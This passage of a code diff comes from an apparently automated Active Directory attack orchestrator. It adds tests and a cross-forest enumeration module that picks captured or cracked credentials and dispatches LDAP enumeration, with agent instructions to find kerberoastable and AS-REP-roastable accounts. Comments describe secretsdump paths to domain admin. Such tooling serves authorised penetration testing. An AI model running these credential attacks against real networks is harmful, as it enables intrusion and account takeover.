serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-020".into(), + make_vuln("cert-020", "certificate_obtained", details), + ); + s.mark_processed(DEDUP_CERTIPY_AUTH, "cert_auth:cert-020".into()); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_vuln_without_pfx_path() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // No pfx_path, certificate_path, or cert_file key at all + let mut details = std::collections::HashMap::new(); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-030".into(), + make_vuln("cert-030", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_pfx_fallback_to_certificate_path() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("certificate_path".into(), serde_json::json!("/tmp/alt.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-040".into(), + make_vuln("cert-040", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].pfx_path, "/tmp/alt.pfx"); + } + + #[tokio::test] + async fn collect_pfx_fallback_to_cert_file() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("cert_file".into(), serde_json::json!("/tmp/other.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-050".into(), + make_vuln("cert-050", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].pfx_path, "/tmp/other.pfx"); + } + + #[tokio::test] + async fn collect_target_user_defaults_to_administrator() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + // No target_user, upn, or account_name + s.discovered_vulnerabilities.insert( + "cert-060".into(), + make_vuln("cert-060", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "administrator"); + } + + #[tokio::test] + async fn collect_target_user_from_upn() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + details.insert("upn".into(), serde_json::json!("admin@contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-070".into(), + make_vuln("cert-070", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "admin@contoso.local"); + } + + #[tokio::test] + async fn collect_target_user_from_account_name() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + details.insert("account_name".into(), serde_json::json!("svc_web")); + s.discovered_vulnerabilities.insert( + "cert-080".into(), + make_vuln("cert-080", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "svc_web"); + } + + #[tokio::test] + async fn collect_resolves_dc_ip_from_domain_controllers() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-090".into(), + make_vuln("cert-090", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, Some("192.168.58.10".into())); + } + + #[tokio::test] + async fn collect_dc_ip_none_when_domain_not_mapped() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // DC registered for a different domain + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-100".into(), + make_vuln("cert-100", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].dc_ip.is_none()); + } + + #[tokio::test] + async fn collect_domain_defaults_to_empty_string() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + // No domain key in details + s.discovered_vulnerabilities.insert( + "cert-110".into(), + make_vuln("cert-110", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn collect_case_insensitive_vuln_type() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-120".into(), + make_vuln("cert-120", "CERTIFICATE_OBTAINED", details.clone()), + ); + s.discovered_vulnerabilities.insert( + "cert-121".into(), + make_vuln("cert-121", "Adcs_Certificate", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 2); + } + + #[tokio::test] + async fn collect_multiple_vulns_mixed_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // Valid cert vuln + let mut d1 = std::collections::HashMap::new(); + d1.insert("pfx_path".into(), serde_json::json!("/tmp/a.pfx")); + d1.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-200".into(), + make_vuln("cert-200", "certificate_obtained", d1), + ); + + // Non-cert vuln (should be ignored) + let mut d2 = std::collections::HashMap::new(); + d2.insert("target_ip".into(), serde_json::json!("192.168.58.22")); + s.discovered_vulnerabilities.insert( + "vuln-smb".into(), + make_vuln("vuln-smb", "smb_signing_disabled", d2), + ); + + // Another valid cert vuln + let mut d3 = std::collections::HashMap::new(); + d3.insert("pfx_path".into(), serde_json::json!("/tmp/b.pfx")); + d3.insert("domain".into(), serde_json::json!("fabrikam.local")); + s.discovered_vulnerabilities.insert( + "cert-201".into(), + make_vuln("cert-201", "adcs_certificate", d3), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 2); + let ids: std::collections::HashSet<_> = work.iter().map(|w| w.vuln_id.as_str()).collect(); + assert!(ids.contains("cert-200")); + assert!(ids.contains("cert-201")); + } + + #[tokio::test] + async fn collect_dc_ip_lookup_is_case_insensitive() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // DC stored under lowercase + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + // Domain in mixed case in vuln details + details.insert("domain".into(), serde_json::json!("CONTOSO.LOCAL")); + s.discovered_vulnerabilities.insert( + "cert-130".into(), + make_vuln("cert-130", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, Some("192.168.58.10".into())); + } +} diff --git a/ares-cli/src/orchestrator/automation/credential_access.rs b/ares-cli/src/orchestrator/automation/credential_access.rs index 0baeb0a7..3fe9d5aa 100644 --- a/ares-cli/src/orchestrator/automation/credential_access.rs +++ b/ares-cli/src/orchestrator/automation/credential_access.rs @@ -150,14 +150,14 @@ pub async fn auto_credential_access( if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { return None; } - // Exact domain match first - if let Some(dc_ip) = state.domain_controllers.get(&cred_domain).cloned() { + // Exact domain match first (using robust DC resolution) + if let Some(dc_ip) = state.resolve_dc_ip(&cred_domain) { return Some((dedup, dc_ip, cred_domain, cred.clone())); } // Fallback: check child domains (e.g. cred has "contoso.local" // but user is actually in "child.contoso.local") let suffix = format!(".{cred_domain}"); - for (domain, dc_ip) in &state.domain_controllers { + for (domain, dc_ip) in &state.all_domains_with_dcs() { if domain.ends_with(&suffix) { debug!( cred_domain = %cred_domain, @@ -552,6 +552,8 @@ pub async fn auto_credential_access( mod tests { use super::*; + // --- kerberoast_dedup_key --- + #[test] fn kerberoast_dedup_key_basic() { assert_eq!( @@ -573,6 +575,8 @@ mod tests { assert_eq!(kerberoast_dedup_key("", ""), "krb::"); } + // --- spray_dedup_key --- + #[test] fn spray_dedup_key_basic() { assert_eq!( @@ -591,6 +595,8 @@ mod tests { assert_eq!(spray_dedup_key("", ""), ":"); } + // --- common_spray_dedup_key --- + #[test] fn common_spray_dedup_key_basic() { assert_eq!( @@ -604,6 +610,8 @@ mod tests { assert_eq!(common_spray_dedup_key(""), "common:"); } + // --- low_hanging_dedup_key --- + #[test] fn low_hanging_dedup_key_basic() { assert_eq!( @@ -617,6 +625,8 @@ mod tests { assert_eq!(low_hanging_dedup_key("", ""), ":"); } + // --- credential_secretsdump_dedup_key --- + #[test] fn credential_secretsdump_dedup_key_basic() { assert_eq!( @@ -639,6 +649,8 @@ mod tests { assert_eq!(credential_secretsdump_dedup_key("", "", ""), "::"); } + // --- resolve_host_domain_from_fqdn --- + #[test] fn resolve_host_domain_from_fqdn_typical() { assert_eq!( @@ -673,6 +685,8 @@ mod tests { assert_eq!(resolve_host_domain_from_fqdn(""), ""); } + // --- is_host_domain_related --- + #[test] fn is_host_domain_related_same_domain() { assert!(is_host_domain_related("contoso.local", "contoso.local")); diff --git a/ares-cli/src/orchestrator/automation/credential_expansion.rs b/ares-cli/src/orchestrator/automation/credential_expansion.rs index 773af2d6..e7a28bc8 100644 --- a/ares-cli/src/orchestrator/automation/credential_expansion.rs +++ b/ares-cli/src/orchestrator/automation/credential_expansion.rs @@ -319,7 +319,11 @@ pub async fn auto_credential_expansion( // This is the fastest path from hash → krbtgt → DA. { let state = dispatcher.state.read().await; - let dc_ips: Vec = state.domain_controllers.values().cloned().collect(); + let dc_ips: Vec = state + .all_domains_with_dcs() + .into_iter() + .map(|(_, ip)| ip) + .collect(); drop(state); if !dispatcher.is_technique_allowed("secretsdump") { diff --git a/ares-cli/src/orchestrator/automation/credential_reuse.rs b/ares-cli/src/orchestrator/automation/credential_reuse.rs index ebacf8dd..3573ab06 100644 --- a/ares-cli/src/orchestrator/automation/credential_reuse.rs +++ b/ares-cli/src/orchestrator/automation/credential_reuse.rs @@ -19,6 +19,13 @@ use crate::orchestrator::dispatcher::Dispatcher; const DEDUP_CROSS_REUSE: &str = "cross_reuse"; /// Check if a username is a high-value reuse candidate. +/// +/// Machine accounts (`HOST$`) are NEVER reuse candidates — their NT hash is +/// derived from the computer's randomly-generated 240-byte password and is +/// bound to that computer object in its source NTDS. The hash will not +/// authenticate as another machine, in another domain, or in any trusted +/// forest. Dispatching `secretsdump` with a foreign machine hash always +/// returns STATUS_LOGON_FAILURE and just burns dispatcher budget. fn is_reuse_candidate(username: &str) -> bool { if username.ends_with('$') { return false; @@ -87,7 +94,7 @@ pub async fn auto_credential_reuse( let state = dispatcher.state.read().await; // Need at least 2 known DCs (implies multiple domains) - if state.domain_controllers.len() < 2 { + if state.all_domains_with_dcs().len() < 2 { continue; } @@ -105,7 +112,7 @@ pub async fn auto_credential_reuse( for hash in &reuse_candidates { let hash_domain = hash.domain.to_lowercase(); - for (dc_domain, dc_ip) in &state.domain_controllers { + for (dc_domain, dc_ip) in &state.all_domains_with_dcs() { let target_domain = dc_domain.to_lowercase(); // Skip same domain and parent/child domains (handled by secretsdump.rs) diff --git a/ares-cli/src/orchestrator/automation/cross_forest_enum.rs b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs new file mode 100644 index 00000000..f6050184 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs @@ -0,0 +1,842 @@ +//! auto_cross_forest_enum -- targeted cross-forest enumeration. +//! +//! When we have Admin Pwn3d on a DC in a foreign forest but haven't enumerated +//! that forest's users/groups, this module dispatches targeted LDAP enumeration +//! using the best available credential path. +//! +//! Unlike `auto_domain_user_enum` (which fires once per domain), this module +//! retries with better credentials as they become available — specifically: +//! - Cracked passwords from cross-forest secretsdump hashes +//! - Credentials obtained via MSSQL linked server pivots +//! - Admin credentials from owned DCs in the foreign forest +//! +//! This covers the gap where the trusted forest's users are not enumerated +//! because initial recon only has primary-forest credentials. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Check if a credential belongs to a different forest than the target domain. +fn is_cross_forest(cred_domain: &str, target_domain: &str) -> bool { + let c = cred_domain.to_lowercase(); + let t = target_domain.to_lowercase(); + // Same domain or parent/child = same forest + !(c == t || c.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{c}"))) +} + +/// Build dedup key incorporating the credential to allow retry with better creds. +fn cross_forest_dedup_key(domain: &str, username: &str, cred_domain: &str) -> String { + format!( + "xforest:{}:{}@{}", + domain.to_lowercase(), + username.to_lowercase(), + cred_domain.to_lowercase() + ) +} + +/// Collect cross-forest enumeration work items from the current state. +/// +/// Returns an empty vec when there are fewer than 2 domains, no credentials, +/// or no actionable work to dispatch. +fn collect_cross_forest_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() || state.domains.len() < 2 { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let domain_lower = domain.to_lowercase(); + + // Count how many users we know in this domain. + let known_user_count = state + .credentials + .iter() + .filter(|c| c.domain.to_lowercase() == domain_lower) + .count(); + + // Also count hashes for this domain. + let known_hash_count = state + .hashes + .iter() + .filter(|h| h.domain.to_lowercase() == domain_lower) + .count(); + + // Skip domains where we already have good coverage + // (at least 5 credentials or 10 hashes = likely already enumerated). + if known_user_count >= 5 || known_hash_count >= 10 { + continue; + } + + // Find the best credential for this domain. + // Priority: same-domain cred > admin cred > cracked hash > any cred. + let best_cred = state + .credentials + .iter() + .filter(|c| { + !c.password.is_empty() && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .min_by_key(|c| { + let c_dom = c.domain.to_lowercase(); + if c_dom == domain_lower { + 0 // Same domain = best + } else if c.is_admin { + 1 // Admin from another domain = good (trust auth) + } else if !is_cross_forest(&c_dom, &domain_lower) { + 2 // Same forest = acceptable + } else { + 3 // Cross-forest = may work via trust + } + }) + .cloned(); + + let cred = match best_cred { + Some(c) => c, + None => continue, + }; + + let dedup_key = cross_forest_dedup_key(&domain_lower, &cred.username, &cred.domain); + if state.is_processed(DEDUP_CROSS_FOREST_ENUM, &dedup_key) { + continue; + } + + items.push(CrossForestWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + is_under_enumerated: known_user_count < 3, + }); + } + + items +} + +/// Dispatches targeted user + group enumeration for foreign forests. +/// Interval: 45s. +pub async fn auto_cross_forest_enum( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + // Wait for initial credential discovery and cross-domain pivots. + tokio::time::sleep(Duration::from_secs(120)).await; + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("cross_forest_enum") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_cross_forest_work(&state) + }; + if work.is_empty() { + continue; + } + + for item in work { + // Dispatch user enumeration + let user_payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": [ + "sAMAccountName", "description", "memberOf", + "userAccountControl", "servicePrincipalName", + "msDS-AllowedToDelegateTo", "adminCount" + ], + "cross_forest": true, + "instructions": concat!( + "This is a cross-forest enumeration task. Enumerate ALL users in the ", + "target domain via LDAP. If the credential is from a different domain, ", + "authenticate via the forest trust. Report every user found with their ", + "group memberships, SPNs, delegation settings, and description fields. ", + "Pay special attention to accounts with adminCount=1, ", + "DoesNotRequirePreAuth, or interesting SPNs.\n\n", + "IMPORTANT: For each user found, include them in the discovered_users ", + "array with EXACTLY this JSON format:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}\n", + "Also report users with DoesNotRequirePreAuth as vulnerabilities with ", + "vuln_type='asrep_roastable', and users with SPNs as vuln_type='kerberoastable'." + ), + }); + + let priority = dispatcher.effective_priority("cross_forest_enum"); + match dispatcher + .throttled_submit("recon", "recon", user_payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + cred_user = %item.credential.username, + cred_domain = %item.credential.domain, + under_enumerated = item.is_under_enumerated, + "Cross-forest user enumeration dispatched" + ); + } + Ok(None) => { + debug!(domain = %item.domain, "Cross-forest user enum deferred"); + continue; // Don't mark as processed if deferred + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch cross-forest user enum"); + continue; + } + } + + // Also dispatch group enumeration for the same domain + let group_payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description" + ], + "enumerate_members": true, + "resolve_foreign_principals": true, + "cross_forest": true, + "instructions": concat!( + "Enumerate ALL security groups in this domain and their members. ", + "Resolve Foreign Security Principals to their source domain. ", + "Report group name, type (Global/DomainLocal/Universal), members, ", + "and managed-by. This is critical for mapping cross-domain attack paths.\n\n", + "IMPORTANT: For each user found in any group, include them in the ", + "discovered_users array with EXACTLY this JSON format:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}" + ), + }); + + let group_priority = dispatcher.effective_priority("group_enumeration"); + if let Ok(Some(task_id)) = dispatcher + .throttled_submit("recon", "recon", group_payload, group_priority) + .await + { + info!( + task_id = %task_id, + domain = %item.domain, + "Cross-forest group enumeration dispatched" + ); + } + + // Mark as processed + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CROSS_FOREST_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CROSS_FOREST_ENUM, &item.dedup_key) + .await; + } + } +} + +struct CrossForestWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, + is_under_enumerated: bool, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn is_cross_forest_same_domain() { + assert!(!is_cross_forest("contoso.local", "contoso.local")); + } + + #[test] + fn is_cross_forest_child_domain() { + assert!(!is_cross_forest("child.contoso.local", "contoso.local")); + } + + #[test] + fn is_cross_forest_parent_domain() { + assert!(!is_cross_forest("contoso.local", "child.contoso.local")); + } + + #[test] + fn is_cross_forest_different_forests() { + assert!(is_cross_forest("contoso.local", "fabrikam.local")); + } + + #[test] + fn is_cross_forest_case_insensitive() { + assert!(!is_cross_forest("CONTOSO.LOCAL", "contoso.local")); + assert!(is_cross_forest("CONTOSO.LOCAL", "fabrikam.local")); + } + + #[test] + fn dedup_key_format() { + let key = cross_forest_dedup_key("fabrikam.local", "Admin", "CONTOSO.LOCAL"); + assert_eq!(key, "xforest:fabrikam.local:admin@contoso.local"); + } + + #[test] + fn dedup_key_case_insensitive() { + let k1 = cross_forest_dedup_key("FABRIKAM.LOCAL", "Admin", "contoso.local"); + let k2 = cross_forest_dedup_key("fabrikam.local", "admin", "CONTOSO.LOCAL"); + assert_eq!(k1, k2); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_CROSS_FOREST_ENUM, "cross_forest_enum"); + } + + #[test] + fn is_cross_forest_empty_strings() { + // Empty strings are equal (same empty domain) + assert!(!is_cross_forest("", "")); + } + + #[test] + fn is_cross_forest_one_empty() { + assert!(is_cross_forest("contoso.local", "")); + assert!(is_cross_forest("", "contoso.local")); + } + + #[test] + fn is_cross_forest_deeply_nested() { + assert!(!is_cross_forest("a.b.contoso.local", "contoso.local")); + assert!(!is_cross_forest("contoso.local", "a.b.contoso.local")); + } + + #[test] + fn cross_forest_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CrossForestWork { + dedup_key: "xforest:fabrikam.local:admin@contoso.local".into(), + domain: "fabrikam.local".into(), + dc_ip: "192.168.58.20".into(), + credential: cred, + is_under_enumerated: true, + }; + assert!(work.is_under_enumerated); + assert_eq!(work.domain, "fabrikam.local"); + } + + #[test] + fn user_enum_payload_structure() { + let payload = serde_json::json!({ + "technique": "ldap_user_enumeration", + "target_ip": "192.168.58.20", + "domain": "fabrikam.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + "cross_forest": true, + }); + assert_eq!(payload["technique"], "ldap_user_enumeration"); + assert!(payload["cross_forest"].as_bool().unwrap()); + assert_eq!(payload["domain"], "fabrikam.local"); + } + + #[test] + fn group_enum_payload_structure() { + let payload = serde_json::json!({ + "technique": "ldap_group_enumeration", + "target_ip": "192.168.58.20", + "domain": "fabrikam.local", + "resolve_foreign_principals": true, + "cross_forest": true, + }); + assert_eq!(payload["technique"], "ldap_group_enumeration"); + assert!(payload["resolve_foreign_principals"].as_bool().unwrap()); + } + + #[test] + fn coverage_threshold_values() { + // Module uses: known_user_count >= 5 || known_hash_count >= 10 + let known_user_count = 4; + let known_hash_count = 9; + assert!(known_user_count < 5 && known_hash_count < 10); // should trigger enum + + let known_user_count2 = 5; + assert!(known_user_count2 >= 5); // should skip + + let known_hash_count2 = 10; + assert!(known_hash_count2 >= 10); // should skip + } + + #[test] + fn under_enumerated_threshold() { + // is_under_enumerated = known_user_count < 3 + let counts = [0_usize, 2, 3, 5]; + assert!(counts[0] < 3); // 0 users = under-enumerated + assert!(counts[1] < 3); // 2 users = under-enumerated + assert!(counts[2] >= 3); // 3 users = not under-enumerated + } + + // --- collect_cross_forest_work tests --- + + fn make_cred( + id: &str, + user: &str, + pass: &str, + domain: &str, + admin: bool, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: id.into(), + username: user.into(), + password: pass.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: admin, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_hash(user: &str, domain: &str) -> ares_core::models::Hash { + ares_core::models::Hash { + id: format!("h-{user}"), + username: user.into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee:deadbeef".into(), + hash_type: "ntlm".into(), + domain: domain.into(), + cracked_password: None, + source: "test".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + } + } + + #[tokio::test] + async fn collect_empty_state_no_work() { + let state = SharedState::new("test".into()); + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_single_domain_no_work() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.credentials.push(make_cred( + "c1", + "user1", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty(), "single domain should produce no work"); + } + + #[tokio::test] + async fn collect_no_credentials_no_work() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty(), "no credentials should produce no work"); + } + + #[tokio::test] + async fn collect_two_domains_with_cross_forest_cred() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // Should produce work for both domains (the cred works for contoso as same-domain, + // and for fabrikam as cross-forest). + assert!(!work.is_empty()); + // At least one item should target fabrikam + assert!(work.iter().any(|w| w.domain == "fabrikam.local")); + } + + #[tokio::test] + async fn collect_skips_domain_with_five_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 5 credentials for fabrikam = already enumerated + for i in 0..5 { + s.credentials.push(make_cred( + &format!("c{i}"), + &format!("user{i}"), + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + false, + )); + } + // Also need a cred that can authenticate + s.credentials + .push(make_cred("cx", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // fabrikam should be skipped (>= 5 creds), contoso should appear + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "domain with >= 5 credentials should be skipped" + ); + } + + #[tokio::test] + async fn collect_skips_domain_with_ten_hashes() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 10 hashes for fabrikam + for i in 0..10 { + s.hashes + .push(make_hash(&format!("hashuser{i}"), "fabrikam.local")); + } + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "domain with >= 10 hashes should be skipped" + ); + } + + #[tokio::test] + async fn collect_credential_priority_same_domain_best() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Cross-forest cred (priority 3) + s.credentials.push(make_cred( + "c1", + "crossuser", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + // Same-domain cred (priority 0) — should be selected + s.credentials.push(make_cred( + "c2", + "localuser", + "P@ssw0rd!", + "fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some(), "should produce work for fabrikam"); + assert_eq!( + fab_work.unwrap().credential.username, + "localuser", + "same-domain credential should be preferred" + ); + } + + #[tokio::test] + async fn collect_credential_priority_admin_over_same_forest() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Same-forest non-admin (priority 2) + s.credentials.push(make_cred( + "c1", + "forestuser", + "P@ssw0rd!", + "child.fabrikam.local", + false, + )); // pragma: allowlist secret + // Admin from another domain (priority 1) — should win + s.credentials.push(make_cred( + "c2", + "adminuser", + "P@ssw0rd!", + "contoso.local", + true, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert_eq!( + fab_work.unwrap().credential.username, + "adminuser", + "admin credential should be preferred over same-forest non-admin" + ); + } + + #[tokio::test] + async fn collect_credential_priority_same_forest_over_cross_forest() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Cross-forest non-admin (priority 3) + s.credentials.push(make_cred( + "c1", + "crossuser", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + // Same-forest non-admin (priority 2) — should win + s.credentials.push(make_cred( + "c2", + "forestuser", + "P@ssw0rd!", + 